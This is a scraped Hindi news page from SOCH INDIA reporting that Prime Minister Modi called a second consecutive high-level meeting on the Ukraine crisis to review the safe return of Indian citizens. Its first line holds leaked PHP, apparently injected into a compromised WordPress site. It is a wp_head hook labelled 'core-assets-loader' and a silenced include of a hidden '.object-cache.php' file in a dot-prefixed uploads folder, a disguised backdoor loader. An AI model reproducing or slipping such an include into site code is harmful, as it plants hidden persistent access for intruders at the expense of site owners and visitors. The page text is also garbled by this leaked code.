add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); यूक्रेन संकट पर लगातार दूसरे दिन PM मोदी ने बुलाई हाई लेवल मीटिंग – SOCH INDIA
Menu

देश
यूक्रेन संकट पर लगातार दूसरे दिन PM मोदी ने बुलाई हाई लेवल मीटिंग

nobanner

रूस और यूक्रेन के बीच छिड़ी जंग से पूरी दुनिया के देश परेशान हैं. भारत समेत ज्यादातर देश यूक्रेन से अपने नागरिकों की सुरक्षित वापसी में लगे हुए हैं. इस बीच यूक्रेन संकट पर लगातार दूसरे दिन प्रधानमंत्री नरेंद्र मोदी ने एक हाई लेवल मीटिंग बुलाई है.

इससे पहले भी रविवार को पीएम मोदी ने उच्चस्तरीय बैठक कर हालात का जायजा लिया था. इस बैठक में विदेश मंत्री एस जयशंकर और एनएसए अजित डोभाल मौजूद थे. बैठक में भारतीयों की सुरक्षित वापसी के प्रयासों की समीक्षा की गई और प्रयास और तेज करने पर जोर दिया गया.